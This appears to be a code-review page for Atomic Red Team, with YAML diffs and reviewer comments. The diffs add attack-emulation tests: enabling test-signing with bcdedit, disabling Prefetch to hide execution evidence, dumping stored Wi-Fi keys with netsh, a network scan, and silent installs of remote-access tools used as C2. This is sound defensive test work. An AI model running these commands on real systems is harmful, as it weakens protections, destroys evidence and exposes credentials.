| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication](../../T1559/T1559.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Application Window Discovery](../../T1010/T1010.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
@@ -57,7 +57,7 @@
| | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md) | | | | | | | |
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | [IIS Components](../../T1505.004/T1505.004.md) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
| | | [Event Triggered Execution](../../T1546/T1546.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+4 -2
View File
@@ -5353,7 +5353,7 @@ defense-evasion:
Driver Loader)"
modified: '2022-05-24T14:00:00.188Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Code Signing Policy Modification
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
that could be taken to modify the code signing policy of a system, such as
<code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
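Review bot: the detection guidance in `x_mitre_detection` quotes the switch as `bcdedit.exe -set TESTSIGNING ON`, but bcdedit accepts both `-` and `/` as the switch prefix and treats option names case-insensitively, so command-line detections derived from this string should match `/set testsigning on` as well as `-set TESTSIGNING ON`. The rename to `'Subvert Trust Controls: Code Signing Policy Modification'` is correctly single-quoted because of the colon; this same hunk recurs in each of the other index files on this page.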
@@ -5376,6 +5376,7 @@ defense-evasion:
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
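Review bot: `identifier: T1553.006` is added while `atomic_tests: []` stays empty in this index, whereas the larger `+123 -6` index further down this page gains a Windows-only test for the same technique; that is consistent only if this file is a per-platform index that excludes Windows, which the page does not show, so please confirm the split is intended rather than a stale generation run.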
@@ -50720,7 +50721,7 @@ discovery:
T1016.002:
technique:
modified: '2023-10-05T11:35:30.887Z'
name: Wi-Fi Discovery
name: 'System Network Configuration Discovery: Wi-Fi Discovery'
description: |
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
@@ -50787,6 +50788,7 @@ discovery:
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
+4 -2
View File
@@ -5257,7 +5257,7 @@ defense-evasion:
Driver Loader)"
modified: '2022-05-24T14:00:00.188Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Code Signing Policy Modification
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
that could be taken to modify the code signing policy of a system, such as
<code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
@@ -49824,7 +49825,7 @@ discovery:
T1016.002:
technique:
modified: '2023-10-05T11:35:30.887Z'
name: Wi-Fi Discovery
name: 'System Network Configuration Discovery: Wi-Fi Discovery'
description: |
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
@@ -49891,6 +49892,7 @@ discovery:
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
+4 -2
View File
@@ -5257,7 +5257,7 @@ defense-evasion:
Driver Loader)"
modified: '2022-05-24T14:00:00.188Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Code Signing Policy Modification
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
that could be taken to modify the code signing policy of a system, such as
<code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
@@ -49318,7 +49319,7 @@ discovery:
T1016.002:
technique:
modified: '2023-10-05T11:35:30.887Z'
name: Wi-Fi Discovery
name: 'System Network Configuration Discovery: Wi-Fi Discovery'
description: |
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
@@ -49385,6 +49386,7 @@ discovery:
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
+4 -2
View File
@@ -5257,7 +5257,7 @@ defense-evasion:
Driver Loader)"
modified: '2022-05-24T14:00:00.188Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Code Signing Policy Modification
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
that could be taken to modify the code signing policy of a system, such as
<code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
@@ -49144,7 +49145,7 @@ discovery:
T1016.002:
technique:
modified: '2023-10-05T11:35:30.887Z'
name: Wi-Fi Discovery
name: 'System Network Configuration Discovery: Wi-Fi Discovery'
description: |
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
@@ -49211,6 +49212,7 @@ discovery:
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
+4 -2
View File
@@ -5257,7 +5257,7 @@ defense-evasion:
Driver Loader)"
modified: '2022-05-24T14:00:00.188Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Code Signing Policy Modification
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
that could be taken to modify the code signing policy of a system, such as
<code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
@@ -49749,7 +49750,7 @@ discovery:
T1016.002:
technique:
modified: '2023-10-05T11:35:30.887Z'
name: Wi-Fi Discovery
name: 'System Network Configuration Discovery: Wi-Fi Discovery'
description: |
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
@@ -49816,6 +49817,7 @@ discovery:
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
+4 -2
View File
@@ -5257,7 +5257,7 @@ defense-evasion:
Driver Loader)"
modified: '2022-05-24T14:00:00.188Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Code Signing Policy Modification
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
that could be taken to modify the code signing policy of a system, such as
<code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
@@ -49959,7 +49960,7 @@ discovery:
T1016.002:
technique:
modified: '2023-10-05T11:35:30.887Z'
name: Wi-Fi Discovery
name: 'System Network Configuration Discovery: Wi-Fi Discovery'
description: |
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
@@ -50026,6 +50027,7 @@ discovery:
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
+4 -2
View File
@@ -5257,7 +5257,7 @@ defense-evasion:
Driver Loader)"
modified: '2022-05-24T14:00:00.188Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Code Signing Policy Modification
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
that could be taken to modify the code signing policy of a system, such as
<code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
@@ -49684,7 +49685,7 @@ discovery:
T1016.002:
technique:
modified: '2023-10-05T11:35:30.887Z'
name: Wi-Fi Discovery
name: 'System Network Configuration Discovery: Wi-Fi Discovery'
description: |
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
@@ -49751,6 +49752,7 @@ discovery:
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
+123 -6
View File
@@ -12288,7 +12288,7 @@ defense-evasion:
Driver Loader)"
modified: '2022-05-24T14:00:00.188Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Code Signing Policy Modification
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
that could be taken to modify the code signing policy of a system, such as
<code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -12311,7 +12311,19 @@ defense-evasion:
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
atomic_tests: []
identifier: T1553.006
atomic_tests:
- name: Code Signing Policy Modification
auto_generated_guid: bb6b51e1-ab92-45b5-aeea-e410d06405f8
description: Allows adversaries to subvert trust controls by modifying the code
signing policy, enabling the execution of unsigned drivers.
supported_platforms:
- windows
executor:
command: bcdedit /set testsigning on
cleanup_command: bcdedit /set testsigning off
name: command_prompt
elevation_required: true
T1610:
technique:
modified: '2024-04-11T21:24:42.680Z'
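Review bot: the new test has no dependency check for Secure Boot, yet on a UEFI host with Secure Boot enabled `bcdedit /set testsigning on` is refused because the testsigning element is protected by Secure Boot policy, so the executor fails and the description gives the operator no hint why; add a `dependencies` entry that checks the Secure Boot state (for example `Confirm-SecureBootUEFI` under a PowerShell dependency executor) or state the limitation in the description. Two smaller points: the description summarises the adversary technique ("Allows adversaries to subvert trust controls...") rather than what the test does and what the operator will observe, which the other tests on this page phrase as "Upon successful execution, ..."; and the cleanup forces `testsigning off` regardless of the prior value, so a host that was legitimately in test-signing mode before the run is left changed. The setting persists in the BCD store across reboots until the cleanup runs, which is worth stating for anyone running this outside a disposable lab.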
@@ -13853,6 +13865,26 @@ defense-evasion:
/f >nul 2>&1)'
name: command_prompt
elevation_required: true
- name: Disable Windows Prefetch Through Registry
auto_generated_guid: 7979dd41-2045-48b2-a54e-b1bc2415c9da
description: 'Modify the registry of the machine to disable prefetch. Disabling
prefetch will remove one artifact for evidence of application execution. Restart
is required post modification
'
supported_platforms:
- windows
executor:
command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 0 /f
'
cleanup_command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 3 /f
'
name: command_prompt
elevation_required: true
T1574.008:
technique:
modified: '2023-05-09T14:00:00.188Z'
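Review bot: the cleanup hard-codes `EnablePrefetcher` back to `3` instead of restoring the value the host had before the test; the value is configurable (0 to 3) and is not 3 on every host, so on such hosts the cleanup changes state rather than undoing the test. Read the existing value before the `reg add` and restore that, or at least document the assumption in the description. Also, "Restart is required post modification" lacks a trailing period and should make clear that the test itself does not reboot, so the prefetch files already on disk remain available to forensics until someone does; from a detection standpoint the registry write of `EnablePrefetcher` to `0` under `...\Session Manager\Memory Management\PrefetchParameters` is the event to alert on.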
@@ -73575,6 +73607,10 @@ command-and-control:
description: Path of MSP360 executable
type: path
default: "$env:ProgramFiles\\Connect\\Connect.exe"
MSP360_Download_Url:
description: URL to download MSP360 Connect from
type: url
default:
dependency_executor_name: powershell
dependencies:
- description: 'MSP360 must exist at (#{MSP360_Connect_Path})
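Review bot: `MSP360_Download_Url` is declared with `type: url` and an empty `default:`, and its description does not say the operator must supply it; with no default the interpolated `Invoke-WebRequest` in `get_prereq_command` receives an empty URI and the prerequisite fetch fails, so either provide a working default or state in the description that the argument is required and that the prerequisite cannot be auto-resolved without it.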
@@ -73586,8 +73622,8 @@ command-and-control:
'
get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe\"
\"https://s3.amazonaws.com/cb_setups/_current/cbra/setup.exe?X-Amz-Expires=604800&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIA2WIZE3YN7NOSY65U/20230515/us-east-1/s3/aws4_request&X-Amz-Date=20230515T024742Z&X-Amz-SignedHeaders=host&response-content-disposition=attachment;filename=ConnectStandaloneSetup_v3.3.0.15_netv4.5.1_cFA9100C6.exe&X-Amz-Signature=1fe3ddf93f8431b182fac90341f80a4ebf8665ddcc0e36dd385ee20d0ce865c9\"\nstart-process
\"PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe\" /S \n"
\"#{MSP360_Download_Url}\"\nstart-process \"PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe\"
/S \n"
executor:
command: 'Start-Process #{MSP360_Connect_Path}
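Review bot: `get_prereq_command` still runs `start-process ... msp360connect.exe /S` on whatever `Invoke-WebRequest` fetched from the operator-supplied `#{MSP360_Download_Url}`, with no integrity check; now that the URL is a free-form input rather than a fixed vendor link, add a `Get-FileHash` comparison against a known SHA-256 (supplied as another input argument) before the silent install and abort on mismatch. Dropping the pre-signed S3 link is the right call: its `X-Amz-Date=20230515` combined with `X-Amz-Expires=604800` meant it stopped working a week after it was minted, so the old prerequisite could not have resolved.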
@@ -73613,6 +73649,41 @@ command-and-control:
$file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
Remove-Item $file1 -ErrorAction Ignore
name: powershell
- name: Splashtop Execution
auto_generated_guid: b025c580-029e-4023-888d-a42710d76934
description: |
An adversary may attempt to trick the user into downloading Splashtop for use as a C2 channel.
Upon successful execution, Splashtop will be executed.
supported_platforms:
- windows
input_arguments:
Splashtop_Path:
description: Path of Splashtop executable
type: path
default: "${env:programfiles(x86)}\\Splashtop\\Splashtop Remote\\Client
for STP\\strwinclt.exe"
dependency_executor_name: powershell
dependencies:
- description: 'Splashtop must exist at "#{Splashtop_Path}"
'
prereq_command: 'if (Test-Path "#{Splashtop_Path}") {exit 0} else {exit 1}
'
get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\splashtop_install.exe\"
\"https://download.splashtop.com/winclient/STP/Splashtop_Personal_Win_v3.6.6.0.exe\"\nstart-sleep
30\nstart-process \"PathToAtomicsFolder\\..\\ExternalPayloads\\splashtop_install.exe\"
/S \nstart-sleep 30 \n"
executor:
command: 'Start-Process "#{Splashtop_Path}"
'
cleanup_command: 'Stop-Process -Name "strwinclt" -force -erroraction silentlycontinue
'
name: powershell
elevation_required: true
T1659:
technique:
modified: '2023-10-01T02:28:45.147Z'
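Review bot: the unchanged context at the top of this hunk has a variable mismatch in the RustDesk cleanup: `$file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"` is followed by `Remove-Item $file1 -ErrorAction Ignore`, so `$file1` is undefined and the installer is never deleted; it should be `Remove-Item $file`. On the new Splashtop test: `get_prereq_command` relies on two fixed `start-sleep 30` waits (one after the download, one after the silent install) instead of `Start-Process -Wait`, which is both slower than needed and unreliable on a slow host; the downloaded `Splashtop_Personal_Win_v3.6.6.0.exe` is executed with `/S` without a hash check; and `cleanup_command` only stops `strwinclt`, leaving a remote-access client installed on the endpoint after the test, which should be called out in the description (or uninstalled in cleanup) so that defenders running this in a lab do not carry a persistent remote-control tool forward unknowingly.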
@@ -99645,7 +99716,7 @@ discovery:
T1016.002:
technique:
modified: '2023-10-05T11:35:30.887Z'
name: Wi-Fi Discovery
name: 'System Network Configuration Discovery: Wi-Fi Discovery'
description: |
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
@@ -99712,7 +99783,19 @@ discovery:
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
atomic_tests: []
identifier: T1016.002
atomic_tests:
- name: Enumerate Stored Wi-Fi Profiles And Passwords via netsh
auto_generated_guid: 53cf1903-0fa7-4177-ab14-f358ae809eec
description: Upon successful execution, information about previously connected
Wi-Fi networks will be displayed with their corresponding key (if present).
supported_platforms:
- windows
executor:
command: netsh wlan show profile * key=clear
cleanup_command:
name: command_prompt
elevation_required: false
T1010:
technique:
modified: '2023-10-31T14:00:00.188Z'
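Review bot: there is no dependency check that the host has a WLAN interface and a running WLAN AutoConfig service (`wlansvc`); on servers and most VMs `netsh wlan` exits with an error that the service is not running, so the test fails for reasons unrelated to the technique. Add a `dependencies` entry (for example a prereq that checks `Get-Service wlansvc` reports Running) or state the requirement in the description. Also confirm on the supported platform that the `Key Content` field is populated with `elevation_required: false` for all-user profiles; if it is not, the description's promise of "their corresponding key" only holds when run elevated. The empty `cleanup_command:` can simply be omitted. For detection, `key=clear` in the command line is the distinguishing token: `netsh wlan show profile` on its own is routine administrative activity, `key=clear` is not.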
@@ -103754,6 +103837,40 @@ discovery:
'
name: command_prompt
- name: Enumerate Remote Hosts with Netscan
auto_generated_guid: b8147c9a-84db-4ec1-8eee-4e0da75f0de5
description: This test uses Netscan to identify remote hosts in a specified
network range.
supported_platforms:
- windows
input_arguments:
netscan_path:
description: NetScan exe location
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\netscan\64-bit\netscan.exe
range_to_scan:
description: The IP range to scan with Netscan
type: string
default: 127.0.0.1-127.0.0.1
dependency_executor_name: powershell
dependencies:
- description: 'Netscan must be installed
'
prereq_command: if (Test-Path "#{netscan_path}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" "https://www.softperfect.com/download/files/netscan_portable.zip"
Expand-Archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\netscan"
executor:
command: cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt"
/range:'#{range_to_scan}'
cleanup_command: 'remove-item "$env:temp\T1018NetscanOutput.txt" -force -erroraction
silentlycontinue
'
name: powershell
elevation_required: false
T1046:
technique:
modified: '2023-08-11T21:10:09.547Z'
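Review bot: the executor is `powershell` but the command wraps the scanner in `cmd /c '#{netscan_path}' ...`, which is unnecessary and changes the process lineage defenders will see from `powershell.exe -> netscan.exe` to `powershell.exe -> cmd.exe -> netscan.exe`; invoke it directly with `& "#{netscan_path}" /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:"#{range_to_scan}"`, or document the extra cmd.exe parent so detections built from this test expect it. Two smaller points: `get_prereq_command` extracts `netscan_portable.zip` without verifying its hash, and the dependency description says "Netscan must be installed" although the tool is a portable archive; "Netscan must be present at #{netscan_path}" matches what `prereq_command` actually checks.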
+4 -2
View File
@@ -7369,7 +7369,7 @@ defense-evasion:
Driver Loader)"
modified: '2022-05-24T14:00:00.188Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Code Signing Policy Modification
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
that could be taken to modify the code signing policy of a system, such as
<code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -7392,6 +7392,7 @@ defense-evasion:
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
@@ -60167,7 +60168,7 @@ discovery:
T1016.002:
technique:
